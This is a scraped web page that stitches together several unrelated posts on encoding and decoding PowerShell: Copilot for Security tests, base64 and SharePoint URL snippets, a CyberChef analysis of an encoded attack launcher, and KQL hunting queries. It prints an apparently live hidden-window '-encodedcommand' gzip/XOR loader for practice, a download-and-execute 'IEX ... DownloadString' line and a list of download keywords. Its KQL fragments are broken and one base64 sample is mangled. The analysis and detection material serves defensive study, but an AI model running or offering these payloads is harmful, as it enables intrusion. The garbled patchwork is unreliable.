Декодирование сценарий power shell с использованием copilot для безопасности

The PowerShell Encoded Commands Tool is a web-based utility designed to simplify the encoding and decoding of PowerShell commands using the EncodedCommand technique. This technique involves converting PowerShell commands into a base64-encoded format, making them less susceptible to detection and modification.

The commands and scripts used in the article has been modified to make sure the function names, comments or variable names do not explicitly call out the use case of the script. This is to ensure that Copilot for Security can decode the PowerShell script without any context of the data. Each test was performed as a separate conversation/session to make sure the platform doesn’t reuse the context of the previous test.

In short – Copilot for Security was tested while being blind-folded 🤷

✅ The results were accurate on the first attempt for every test. Even with multiple testing across multiple conversations/sessions – the results were accurate.

✅ The formatting of the input text appears to have been removed – yet it has not affected the outcome.

✅ The test was successful even for a 100+ lines script

✅ For Test 2 – I was hoping it would automatically detect the destination folder (F:\SanDisk-32GB\files) as an external drive. But that could be because the question doesn’t explicitly ask about it’s intent.

✅ The presence of multiple plugins can delay the response time, as Copilot for Security needs to evaluate each one to determine the most suitable plugin for the given prompt. Therefore, it is recommended to use only essential plugins to ensure a faster response.

Sometimes you want to store a PowerShell command not readable at first read. This is so called an obfuscation. It is an action to make something unreadable for humans. For example, this could be used when storing a PowerShell command in a task schedular job or something similar.

How to encode your command?

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($string))

How to decode the encoded command?

To decode the encoded variable, you can use:

[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($EncodedCommand))

Another method to encode/ decode!

A nice way to also decode and encode your command is via the Base64 Decode and Encode website:

:/>  Сбиваются настройки даты, времени и часового пояса на Samsung Galaxy | Samsung RU

Base64 Decode and Encode – Online

And of course, the same for encoding your command!

How to decode a PowerShell command from a running process?

Microsoft has a nice write up about how to decode running process, this because PowerShell stores running commands in also as an encoded command:

Thank for reading this short blog, hopefully it was informational and helpful when you need to encode your commands!

#Parameter
$URL = "https%3A%2F%2Fcrescent.sharepoint.com%2Fsites%2Fmarketing%2F2018%2FDocuments%2FInfo%20Mgmt%20v2%2Epdf"
#Decode URL
[System.Web.HttpUtility]::UrlDecode($URL)
#Output:
https://crescent.sharepoint.com/sites/marketing/2018/Documents/Info Mgmt v2.pdf

$EncodedURL = "https%3A%2F%2Fcrescent.sharepoint.com%2Fpersonal%2Fsalaudeen_crescent_com%Documents%2FAssets%20%26%20Inventory.xlsx"
[system.uri]::UnescapeDataString($EncodedURL)

#Import PoweShell Module for SharePoint Online
Import-Module Microsoft.Online.SharePoint.PowerShell -DisableNameChecking
#Function to Decode URL
Function Decode-URL([string]$URL)
{ Try { #Decode the URL Return [Microsoft.SharePoint.Client.Utilities.HttpUtility]::UrlKeyValueDecode($URL) } catch { Return "Error Getting De-codedURL: $($_.Exception.Message)" }
}
#Parameter
$URL = "https%3A%2F%2Fcrescent.sharepoint.com%2Fsites%2Fmarketing%2F2018%2FShared%20Documents%2FInformation%20Management%20v2%2Epdf"
#Call the function to decode URL
Decode-URL $URL 

Encode URL in PowerShell

$URL = "https://crescent.sharepoint.com/personal/salaudeen_crescent_com/Shared Documents/Assets & Inventory.xlsx"
Write-host([URI]::EscapeUriString($URL)) 

$URL = "https://crescent.sharepoint.com/personal/salaudeen_crescent_com/Shared Documents/Assets & Inventory.xlsx"
[System.Web.HttpUtility]::UrlPathEncode($URL)

Salaudeen Rajack

Encoding is a something that has exsisted for decades and not new a new created concept for information technology. In essence, encoding is the transformation of data into a specific format or structure for secure storage or efficient transmission. In ancient times, civilizations used rudimentary encoding methods like the Caesar cipher to protect sensitive messages from adversaries. As technology advanced, more sophisticated encoding techniques were created, especially since computers could easily decypher the contents. In the world of cyber adversaries use encoding in a similar way, they want to write code that evades detection. This blog will dive into the detection and decoding of Encoded PowerShell using Defender For Endpoint data.

Powershell can be used encoded to obfucstate the commands that have been executed. Those encoded executions are classified in MITRE ATT&CK technique T1027.010 (Obfuscated Files or Information: Command Obfuscation). An attacker can choose encoding to hide the downloading of malicious files, or to prevent simple string matching detections. The goal of this blog is to identify the systems that execute encoded powershell and to classify the traffic as benign or suspicious.

This blog specifically focusses on base64 encoded PowerShell Executions. The base64_decode_tostring() function can be used to encode all base64 encoded string, regardeless of the scripting language that is used.

Using the ConvertFrom-SecureString cmdlet:

$SecureString = Read-Host -AsSecureString
$Hex = $SecureString | ConvertFrom-SecureString

Default (hexadcimal) output

$Hex
01000000d08c9ddf0115d1118c7a00c04fc297eb01000000da4b9d0c09bdb140b3060606f3557e12000000000200000000001066000000010000200000003e5e7e364bba09ff85c69e5ab52d6503c9782f2e6fb280e6d5259adb194d5872000000000e8000000002000020000000fbaff7af38d8a7fa03283907bd428a0160ab0e17748eaef159767f3dac4699c310000000700931ab89b21c663e2d8c55eb62328d40000000883276253b23475ea08afacaba679cc97cfb17a16c8155bcc4f1d4210ebcc7506c4e1d94b94aa18d9454c9795ce4e857a063267027c36f1c8ae1ba64da3d1863

Not sure wherefore you need this format:

$Hex -replace '..', '\x$&'
\x01\x00\x00\x00\xd0\x8c\x9d\xdf\x01\x15\xd1\x11\x8c\x7a\x00\xc0\x4f\xc2\x97\xeb\x01\x00\x00\x00\xda\x4b\x9d\x0c\x09\xbd\xb1\x40\xb3\x06\x06\x06\xf3\x55\x7e\x12\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x10\x66\x00\x00\x00\x01\x00\x00\x20\x00\x00\x00\x79\x5d\x5a\x40\xed\xde\xc7\xea\xad\x34\xe3\x95\x05\x9b\x6c\x62\xc9\x0f\x46\xa9\xe3\xb2\x8f\x44\xe1\x05\xe4\xd2\xe1\x53\x82\xad\x00\x00\x00\x00\x0e\x80\x00\x00\x00\x02\x00\x00\x20\x00\x00\x00\x9f\x46\x73\x15\x59\x55\x4b\xd6\x49\xc8\x7f\x65\xc6\x65\xf5\x46\xc8\x82\xc7\x2b\x1f\xc0\xac\x85\x09\x29\x57\x53\x0a\xde\x1c\x03\x10\x00\x00\x00\x57\x73\xd9\xfc\xe1\xe0\x00\x63\x33\xcf\x8d\xf1\xd0\xad\xb7\xf0\x40\x00\x00\x00\x8d\x54\x05\xae\x06\x15\x25\x74\xfd\x5c\xf6\x6e\xb3\xce\xf0\xa7\xd6\x32\x6b\xb5\x18\xe8\xd1\x85\xf1\xf2\x45\x13\x8e\xbc\x15\x38\x84\x14\xb1\xdb\x89\x9c\x74\xb2\xa1\xf6\xf8\x48\x1f\x61\x5f\x26\xe9\x2c\x78\x2d\xeb\x3c\x81\x1b\x74\x77\x2a\x5d\x31\x80\x20\xb4

Actual Bytes

$Bytes = [byte[]] -split ($Hex -replace '..', '0x$& ')
"$Bytes"
1 0 0 0 208 140 157 223 1 21 209 17 140 122 0 192 79 194 151 235 1 0 0 0 218 75 157 12 9 189 177 64 179 6 6 6 243 85 126 18 0 0 0 0 2 0 0 0 0 0 16 102 0 0 0 1 0 0 32 0 0 0 121 93 90 64 237 222 199 234 173 52 227 149 5 155 108 98 201 15 70 169 227 178 143 68 225 5 228 210 225 83 130 173 0 0 0 0 14 128 0 0 0 2 0 0 32 0 0 0 159 70 115 21 89 85 75 214 73 200 127 101 198 101 245 70 200 130 199 43 31 192 172 133 9 41 87 83 10 222 28 3 16 0 0 0 87 115 217 252 225 224 0 99 51 207 141 241 208 173 183 240 64 0 0 0 141 84 5 174 6 21 37 116 253 92 246 110 179 206 240 167 214 50 107 181 24 232 209 133 241 242 69 19 142 188 21 56 132 20 177 219 137 156 116 178 161 246 248 72 31 97 95 38 233 44 120 45 235 60 129 27 116 119 42 93 49 128 32 180

Base64

[Convert]::ToBase64String($Bytes)
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA2kudDAm9sUCzBgYG81V+EgAAAAACAAAAAAAQZgAAAAEAACAAAAB5XVpA7d7H6q0045UFm2xiyQ9GqeOyj0ThBeTS4VOCrQAAAAAOgAAAAAIAACAAAACfRnMVWVVL1knIf2XGZfVGyILHKx/ArIUJKVdTCt4cAxAAAABXc9n84eAAYzPPjfHQrbfwQAAAAI1UBa4GFSV0/Vz2brPO8KfWMmu1GOjRhfHyRROOvBU4hBSx24mcdLKh9vhIH2FfJukseC3rPIEbdHcqXTGAILQ=

Round trip

$Base64 = <your base64> # e.g.: 'AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA2kudDAm9sUCzBgYG81V+EgAAAAACAAAAAAAQZgAAAAEAACAAAAB5XVpA7d7H6q0045UFm2xiyQ9GqeOyj0ThBeTS4VOCrQAAAAAOgAAAAAIAACAAAACfRnMVWVVL1knIf2XGZfVGyILHKx/ArIUJKVdTCt4cAxAAAABXc9n84eAAYzPPjfHQrbfwQAAAAI1UBa4GFSV0/Vz2brPO8KfWMmu1GOjRhfHyRROOvBU4hBSx24mcdLKh9vhIH2FfJukseC3rPIEbdHcqXTGAILQ='
$Bytes = [System.Convert]::FromBase64String($Base64)
$Hex = -Join $Bytes.Foreach{ $_.ToString('x2') }
$SecureString = $Hex | ConvertTo-SecureString
$SecureString | ConvertFrom-SecureString -AsPlainText

This is the continuation of my previous part-1.

Here we will analyze another base64 code.

Code for practice:

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAEwAVQAyAEMAagA1AGcANABXADEATgAxAFYAVQBCAFEAUQBCAFQAZgB1AGEAawBVAGoAeABaAFIAbwBIAGsAMABLAE4ANgBaAC8ALwAwAGUAVQBIAE0AegBPADUAbgBkAHEAZABxADEAaQByAEsANwBPAGMALwBmAGUAZgBSAEIAUgBlAFIATwBKAGEARgB0AEUAQQBtAGIAaQBMAHEAYgBvAHoAQwB5AHMAVQBmAFYAQwA0AFYAYgBCAGcAdQBFACsAawByADkAVQBTAHgAcwBZAHMAOABnADIAWABHADIAZQBMAE0AUQBlAGYATgBEAGIATAB4AHAAcABoAG0AaQBLAEsATAArAEsAdAB3AG8AVwBxAGkANQBWAE8AawAyADAAYwBJADMARgA1AHUAeABnADYAcABVAHYAcwBrAEkAawBSAG0ASABxAEgAeAB6AFUANwBqAEoAagAyAEkAdgAwAGoAYgBvAHoAZABPAEkAbgBhAEEAMwBGADUARQB0AE4AaQBOAFEAVgBIAHIAcAArAEQANgBEAFgAYwAzADIAWAByADkAOAA2AGMAVgBoAGkARAB4AHkAMwB0AC8AMwBFAGUAbABFAEUAWABKADEAeAAwAFoAUgBxAFUAeAA5AG8AeABaAGIARgBLAEsANwBrAGIANQBEAEIAcQBIACsAbwBtADcAZgA3AHYAcwBPADEAagBYAG4AUQBwAGIAMgBOAEcATQBMAEQAbgBVADgATQAzAHMAbgBZAGsAUABMAFAATABoAFgAZgBjAGMAbQBwAGUASwBmAGYAeABiAEwATAAzAGUAMQAxADMAcwAyAGkARABVAG4ASwBoAFgAVgBOAEMATABJAHYAVABjAGQAcAAxAGkAbQB2AHAAYwB6AGgAZABQAFUAUgA2AFcAaQBaAEIAcwBoAGoAdgBDAEcAMwBDADkAcwByADEARwAvAG4AKwBYAFcAeQA3AG4AeAAwAHQAbgAyAFkAdgBuAGkAbQBlAFYAcgA0AE0AZQB2AG4AYwB5AGsAbgBuAGwASwBSAFYAZwBxAGcARQAzAG4AagBHAEcAeABTAHIAMQBrACsAbAA1AGUAWAA2AGsALwAzAHEAMgBaAHgAQgA2AHgAWABYAFEAdgBlAEEAUwBGADIARgBkAFIAbQBOAGcARwBpAHUANQA1AHoAVABNAGQATgBFAEUAYgBZAEMAdABHAEUARAA3AFAASwBwAGIAQgBpAEIAQwBSAE8AUABTAG8AcQB5ADMAQQBsACsAQQA5AEsAdAAxADYAcwBlAE4AVQBRAGUANwBMADcAOABwADkATABjAG4AbwBjAEEAWAAzAGQANQBsAEsASAA1AG0AQQBTAGkARgBoAHUAWAByAEoAaQBkACsAQgBRADgAcgB6ADUAaQB3AE8AMwBQAG4ASgArAGcALwBKAFYAWQBiAGYAVAB3AGwAVwBMAG4AdwB2AGYASgBLAHEASgBuAEsAUQBwAFIASAAwAFIAZwBEAGYARAA3AGwAYQB1AEwAbAA1AHkAWgBjAEkALwBDAGsAcABPAEwASgB6AHYAcQA4AFUAWABhAFUAawBNAEUASQBqAE8ARQB5AHoAYwBFADcARABHAEoAVgBmAC8ANABuAFAAVwBlADIAVgBNADYAcgArAFUAbABEAHQAeQBuAFgAaABPAFkAZgBuAGIATQBkAFgANgBtAFcATwBiAGYATwAxAGMARgBNAHUAWABMAEkAbgBPADMALwBUAFkAOQBzAHgAVQBaAGkAOQAvADMAVQAxAE0ARwBoAGoAZQA0AGgASgBQAGMAMgAxAGoAVwB2AEMAbAB6ADYATABHAGQAbwA0AEsATQBmAGoALwBrAG8AbQBnADUAMgBsADQAdQBVAEYATQBwAGsATABPAHMAVQBNADAASgBlAGYAMgBWAGoAWABKAHUAKwA4ADMAYgBOAHgASABRAFAAaQBIAG8ARgBWAGsAQgBMAGwASAA0ADAANQB4ADcAQgBVAEYARAB3AEoAdQBZAEQAZgBlAFEAOQBwAGUAcgB1AEIATQBrAE4AWAA2AGsAdABwAHAAVgBmAHQAMgBUADcATAA1AFoANgBqAFIAVgBHAFYAVQBtAEsAbwBjADYATgBLAHEAVQBoAHoAawBGAG0AbABPAGwANQBrAFgAMQA1ADEAWQBvAEwAegBaAGYARQBmAGMANgBYAFkASQBiAGEAaABSAGUAUQBxADcAcgBYADgAQwBhAFEAWAAxAFQAMwBzAFEAYwBYAEUAQgBrAFEAWABZAEoAaQBxAFAAagBKAHMAegBjAGwAUQBxAFYASwA4AGIAYQBKAHUAcQB0AHIAVwAxAFkAVABpAHAANQBqADAATgBNAGUAQgBrAGcATgBKAEMAYwBRAEUAVABqAEkAcwBWAEoATABsAFQARwBoAFcALwB6ADAALwB5AHYAYwBxAEkAbwBMAHIATwA4AGcARgA2AHIAdwBMAGMAWQA1AG0AUQBjACsANQBWAEYAUwBlAGIAcABxAEYAegBPAEoALwBNAFAAdABhAEoAKwBlAGkAeQBMAEMANgBnAHYAVABCAGEARQBnAEEAMQBjAEcAawBTAHMAMwB0AGsARQBCAGYASwAxAFoALwBTAHIAegAvAHoAYgB3AGYAVwA4AHcAUABaAHYAWgBDAGQAQQBsAGsASwBTAC8ARQBsADIANQBLAHMAbgBMAEoASwBZADMAcwBjAHYAbgA2AGoAbQBXAE8AWABFAGcAQQBOAFMANwBFAGIAbABlAEwAVQBLAHUAcAA1AG0AMgBzAFYARwB3ADgAeAA0AEcAUQBTAHIAdAB4AEsAKwB5AHoAQwBjAGMASABQAEQAdQBGAEoANABHAG4ARQBYAEMAcwBLAEEANABtAGYAbgBjAGkARwBtAHcAOABVAG4AaAA2AHMAQgBIAEcAegAwAHcAegBQAHMAUgBDAFAATwAzAFMARABZADQARwB1AGwAUABRAFoAegBkAEMATQBzAEsAcgBXAHUAdwAyAGEANgBZAHYASgBEAEsAYwBSAFUAOABCAEgAegBGAEMAdwBuAFQANABlAG8AQwA1AGwAbQBXADMATAAzAEwATwAvAEcAUAA5AFUATgBPAFgAQQB2AGUAawA5ADcAawBtAFAANAArADQAagBKADQAWABrAGkANABYADkATgBvAFkAMQBnADkAQwAwAHMATQBEADQASAB0AHUAKwBWADcAMwBZAEQAWQBSAE8AMgBpAGgAcABXAGcAYwBHAHUAUQBaAGEAZABZAHgASABjADQAcgBLAGwAMwByAHoAMQBOAFoAbgBMAE8AKwByAEgAcQBtAHEATgBmAEcAMwBFAEEAKwAxAFYAUAB3AEMAZgB4AFMARwAvAHkARQBOAHUARgBSAGoAMAA1AHQAZwBhAGQARwBPAHcAcgA0AHoARgAvAFUARgBRAFAARABHAHcAdwBFAGYAcABDAHEAagA1AFkAdABwAFAATABCAG8AQQBrAGQAaABDAGUAbgBvAGEAeABQAGEAZgBBAE0ALwBIAEkAVABNAEQAbQBxAHEAVABSAHAAdABzAHkAagBzAGUAUQBPAHgAbABJAFcAVQAzADQAbAA5ADAARgBIAEUAQwArAHMASgBpACsATAArAE4AagBaAEMAYQAyAFEAVQBWAFgAegBwAEUANgBQAE4AYgBXADIAZABoAEoAdABhAGIAUwA5AFEANgA1AGYATgBZADgASABjAHgAYQBOAEIAbABPAHkAYQBpAGkAYQAyADAAeABUAHIANgBVAEsATwArAEUAbwBHAGoANgBaAEwAdwBlAHQAVQBFAHQANwB2AG0AZwBqAHYAYgBzAGgAbQBkAHkAQgB1AEwAWQBHAGIAUgBiAFcATABEAG4AUwBxAGoAcABKAFQAZABEAHIAOABGAE4AbQBDAEgAcQA5AG4AaQBTAEIARAA5AG8AagB0ADkAcQBqAGgAagBKAGMAeQBDAGUAagAwAFIAVwBOAE4AQgBUAEEARAAyAFgAWQBzAGsASAAyAE0ANQBFAGEAYwBNADcAMAAxADQAOABtAE8AOQB1AHAANwBBAEcAYgBnAHMAWABpAHcAWABCAHAAdABaAGEAUAB3AFUAbgBoAG4AWgBvADkAcQB1AGwAeAB2AHoASwBQAGUANgAyAFEAKwBCADcAbQBtADcAWABBAHEAbABmAEEATwBkAFAAdgAxAEsAZgBtAGIASQBrAGQAdgBrAEkARwBEACsANQBzADEASAByAFUAMAAvAGoAQgBQAEQANwBJAHcAQgAwAFIAMQBuAG0AbwBLAGEANgAvAFEATAA0AHoAbwBqAGQAcwBxAE0AcgAxAEcAYgB1AGUATQBPADYAQQBuAGUAeAByAHkALwA1AFkAagBxAGUAYwBNADUAegBTADcAUgA3AFQAWABjAG4AcwBRAFIATABIADcASABFADAAbwB3AGQATABkAGMAOABwAGsANgAzAEYANgBGADQAMwBXAEYAdQBTAHgAawB5AGsAVgBhAGMAeABHAFUANQBuAHAAagBUAG4ATwBvAHkAKwBOAEIAaAB1AFQASwB2ADkAagB0AHkAWQB6AFgAdwArAGsANQBmAEwATwBGAHIATQBhAG4ARQBNADEAbAB1ADgATQBoAHIAbQAxAGgAagBqAGUASwBnAHEAegBiAGsAZgBjACsAcgB3AGEAUwBLADEAVgBpAHYATQBMAHEAeABIAFcAVwBtAHAANwBUADAAegBTAFoAKwBTAFcAcQBYAHQAdABKAGEASgB0AGwAbgB2ACsAOAA5AE4ATABuAEEAbgBzAFQAbQBXAEoAVgA2AGUASQAxAFoAcQBMAHgAUgBtAEYAaQByADkAVQA1AGUAdgBrAC8AWABhAGwALwBaAGEANQBMAFcAUwBQAGgAdgA0AHMAagArAGIANwBlAHkAdABQAGYAYgAyAGsASABnADQARwBUAHoATwBEAHIASwA4ADYASgBLAGwAdQBlAGgAdQBCADAAKwBDAEsAZwA3AFgAUQBhAHQAegBXAE0AbQA0AFYAMgBIAG8AcgBiADcAcgBIAHAALwBkADkASQBqAEcAegBsAE8AMABhADIAKwBSAEkAZABhAEcAKwAwAEUAOABxADcAdAA2AHgAVwBHADIAeQB0AEsAYQBWADgAWQBLAHIANgBkAHkAZQByAFEAVwBkAGIARgBqADkAcABkAEQAcQBiAC8AcgBIAEMAYgBNAFkATQBOAEgALwBuAFQAagB1AHkAZAA5AHUAdABuADUAZgBXADAAZABJAG8ANQBPAFAARwAvAGsASwByAE8AdwBWAHgAbgBqAFYAUwBCAEwAYwB6AEoAegA5AG4AaAB5AGUAbABEAFcAagBqAEoAZAByAEMAdQAxAGoAYQBpADIAUgBpAEcAeQBWAGwATwB6AGYAdwBwAFkATABuAEUATgBsAHIARAAxADUASQBpAE0AcAAyAEIATABGAHMASgBPAGIAWQA4AFcAMQBoAEoAeQBjAGUALwBzAEkASQA5AFAAawBOAE0AaQBQAEQAdQBoAE0AUgBGAFIAMAB6AHcAYwBJAGMAZQBpAEEAYwA1AHEAWgBTAGMAawBmAG0AbwBNAFEAOQBaAGsAbwAxADAASAA5AGcAWQAvAEYAeQBWADkARQBSAHoATQBVADkAMgBQAEkAZQB5AGEAdABSAGYAaQBIAHQAUwA0ADMAawBjAFYAUgBnAHoASQBFACsAUwBkAHMATwB4AGIAOQBLAFIALwBvAEgAWABXAGcAcABqAFoAZQBkADEAWgBXAGYAZgBhADQAQgBEAG0AawBXAE4AMgB4AC8AKwBMAGcAdgA4ADcAaAAxAEQAdgAvAFEAbQA2AEUAagBTADgANwBMAHgAUwBLAFcAZAB6AHcAdgB1AGIAbAA5AHYAagA2ADMAVwB1AGUAOQAvAGYANgBVAGUAUQAxAG4AagBNAGUAbAAzACsASgB0AEUAKwBkAEwAaABmAEQAVQB1AFMARgBrAFoAYgB6AFkASABPAEIAdwBQAFAAOQBiAHIAaQBjAE0AaABkAHgAaABZAEYAMgB4AGwASABxAGYAVAA1AHAATAAxAEgAbwBZAGMAYwBtAEUASgBoAFQAcgAwADIAKwBZADcAagBZAEMATQBiAHQASAA0AHgAOABjAEQAWQBkAHgANwBHAFgAdQBFAHkAbQA4AEcAeQBVAGYAOQAwAFYAYQBiAGUAQwBXAEcANgBPAHYAdQBrAHgANQB0AE4AUABvAHgAYwBQAEwAegBPAFoARgBmAEMATAAxAC8AVwA0AEYANwAxAEEANABnAGkAOABpAHkAeQByAFYATAAwAHMAVQBIAFQAZABQAGIAZgBwAE0AdQBGADMANABlAGwAaAAvADIAMAA5AEMANgB1AG0AZwAxAGoASAB5AHoANQBxAE0AbgBKAE4AWgBVAHYANgBJAGUAeAA1ADYATAAvAFkAdwBCACsAVQBQAHIAZgBvAGMAMwBBAHkAKwBlADUAZAArAGgAeQBnAHoANwBIAHEAMQB3AG8ALwBsAEUAbwBDAEIAdgBxAHcAMwBsAGsAbgArAEIAcgBCAFEAWABVAGMANQA1ADcARQBkAEYAQwBjAHIAZgBEAE8AbgB6AGEANQBIAGQAMQA2AFYAWQByAFUAdwBLADcAcABHADQAMQA2AGoAdAAxAEIAKwA1ADEAbwBrAFkAZAB2AG0AOQBDAEsAOAA0AHUAYgB1AHIAOAB1AGYAYQBOAE8AbQBqADIAbQBmAEUAYgBOAFUARQBHAGcAbgBIADcAYgBvAEIAMQB5AEYASQBFADgAMQBjAG0ATwBoAGUAUwBFAGMAUABaADMANABXAEQAVwBDAGoALwBEAFEAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

You can read some interesting base64 pattern cheat sheet from the below link.
https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639

We got a base64 code. And we have cyberchef to decode this. After decoding this we have value but that are mixed with lots of null bytes. So we need to use now Remove null bytes recipe from cyberchef to remove those.

After removing all the null bytes, we have something to human readable. But you may notice that anohter base64 code is there. So now we will decode that as well.

After decoding that we got something gibbrish. You may think that the red mark characters are null bytes; but they are actually not. You can also see that cyberchef magic stick is showing and when we hover our mouse there, then Gzip file detected message is giving.

Using the Gunzip recipe, we got a readable powershell code.

Going down a bit, we found another base64 code which is xored with key 35. Lets decode the base64 first then xor it with key 35.

We can see that one IP address. This is the IOC that the threat actor was comunicating with.

So let’s summarize what attacker did.

1. Attacker first xored the IOC with a key 35. Then attacker got a value. Then attacker encoded that value using base64.
2. Then attacker compress that uaing gunzip. Then whatever the value he got, he again encoded that using base64.
3. With that value, he added some null bytes. Then again he encoded that using base64.

If you notice, we just need to reverse this from 3 to 1 point to get the actual IOC that attacker might be comunicated with.

I hope you will learn something new from here.

Thanks. Please Subscribe below.

PowerShell Encoding

Before we can start hunting for any encoded PowerShell commands, we need to understand what it is and what the incidcators of it are. For this part is is important that the encoded PowerShell is directly executed, the encoding of files is less interesting in this case. We build our theory based on cases in which actors used encoded Powershell (see section).

For all examples you can use KQL to translate this or any encoded base64 string, using the base64_decode_tostring() function. This works for all base64 strings, not only PowerShell.
lo

let YourEncodedBase64Command ;

Encoded WebRequests

Similar to the previous step we explicitly search for encoded commands in combination with a different indicator, this will yield better results. Thistime the additional indicator is focussed on encoded downloads. This technique is often used by attackers to evade their download actions, or to limit the impact on custom detection rules, that are only scoped on normal commands.

The downloads list that is used in this detection:

let DownloadVariables = dynamic(['WebClient', 'DownloadFile', 'DownloadData', 'DownloadString', 'WebRequest', 'Shellcode', 'http', 'https']);

Detailed queries for this step can be found on my GitHub: MDE & Sentinel KQL Query

Custom Detection & Analytics rules base64

To increase the likelyhood that a encoded PowerShell command has been executed with malicious intent you can filter on commandlines that have PowerShell, bypass and one of the encoded PowerShell commands. Note that you would also filter all malicious scripts that do not have to bypass the current execution policy.

let EncodedList = dynamic(['-encodedcommand', '-enc', '-e']);
DeviceProcessEvents
| where ProcessCommandLine has_all ('powershell', 'bypass', EncodedList) 

Questions? Feel free to reach out to me on any of my socials.

Investigate encoded PowerShell commands

The seconds step also shows all the commands that have been executed by each device. This is done by decoding the commands in order to be investigated. This is then listed by DeviceName the amount of unique queries that have been executed by that particial device in the selected timeframe. The image below shows the results of this step.

The question what defines a malicious PowerShell command is the same as with clear text executions. But there are a few indicators that can indicate suspicious PowerShell usage, these could be:

• Downloading Remote Files (directly from an IP address)
• Attempting to bypass execution policies
• Trying to modify registry run keys
• Clearing (security) logs or disabling logging

If you identify one of the above indicators in the query results, take some time to investigate before moving to the next steps.

Found suspicious PowerShell Executions?

If you have found suspicious PowerShell executions in your environment it would be recommended to perform some incident response queries, to determine the impact. In the GitHub repository the category DFIR can be used to run those queries, to quickly list malicious activities.

Queries for this step can be found on my GitHub: MDE & Sentinel KQL Query

Reconnaissance Activities

In this step we further build upon our previous queries to specifically look for reconnaissance activities. We are now going to enrich the privious query with commands that can be related to recon activities. For this step a predifined list of recon activities is defined:

let TimeFrame h; Customizable h hours, d days the decoded commandline Recon variables

Detailed queries for this step can be found on my GitHub: MDE & Sentinel KQL Query

How to Use

1. Enter PowerShell Command:

• Input your PowerShell command into the designated text area.

2. Encode or Decode:

• Click the “Encode” or “Decode” button, depending on your desired operation.
• The output area will display the result of the encoding or decoding process.

3. Copy to Clipboard:

• Click the “Copy to Clipboard” button to easily copy the encoded or decoded command for use in other environments.

List the devices that execute encoded PowerShell

In this step we list the devices that execute Powershell by the amount of encoded PowerShell commands executed. This is done to analyse the encoded PowerShell behaviour in for tenant and which parameters are used. This can give an indication on which device needs to be investigated further. Executing encoded scripts is not necacaraly suspicious, several legitimate solutions are used in the wild, for example to limit the script size.

The amount of encoded PowerShell executions can differ a lot in tenants, thus this indication can shed some light on the current situation and if we need to apply some filters to limit the results.

The query (below) investigates the DeviceProcessEvents for PowerShell executions. The next step is to check if the commandline contains any of the parameters in the EncodedList. If that is the case we extract the base64 string from the commandline using regex. This string is than decoded (but not used yet). Lastly we use the summarize operator to get the count for each device.

let TimeFrame d; Customizable h hours, d days

Example

powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKAKQAUAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAAA6ACAALwA0ADUALgAxADMANgAuADIAMwAwACAWAADEAOgA0ADAAMAAwACAAyADMANABSADIAMWAnACkAOwA=

powershell.exe -exec bypass -enc IEX (New-Object NetWebclient)DownloadString('http://127.0.0.1:32467/')

Based on the example we can see that adversaries use PowerShell on the commandline and a parameter to execute encoded powershell. This paremeter can be used in differrent forms; -encodedcommand, -enc or -e. Note that this execution also performs a bypass, which is intersting for later detection.

Threat Reports containing encoded base64 examples

Features

1. Encode and Decode PowerShell Commands:

• Easily encode your PowerShell commands to generate EncodedCommand strings suitable for use in various scenarios.
• Decode EncodedCommand strings back into the original PowerShell commands for analysis or modification.

• The tool provides a clean and intuitive interface with text areas for input and output, making it accessible to users with varying levels of PowerShell expertise.

3. Copy to Clipboard:

• Quickly copy the encoded or decoded result to the clipboard with the “Copy to Clipboard” button, streamlining the process of integrating the commands into scripts or other PowerShell environments.

Considerations

• UTF-16LE Encoding:

The tool ensures proper encoding and decoding, including conversion to UTF-16LE format as required for PowerShell EncodedCommand strings.

• Security Awareness:

Похожее:

Как декодировать онлайн-url-адрес share point с использованием powershell Как бесплатно пользоваться нейросетью аналогом chat gpt в россии «Изменение размера шрифта для устройств Nokia по сравнению с изменением общего масштаба шрифта приложения на Android с использованием Configuration.fontScale»? Alt-коды для Windows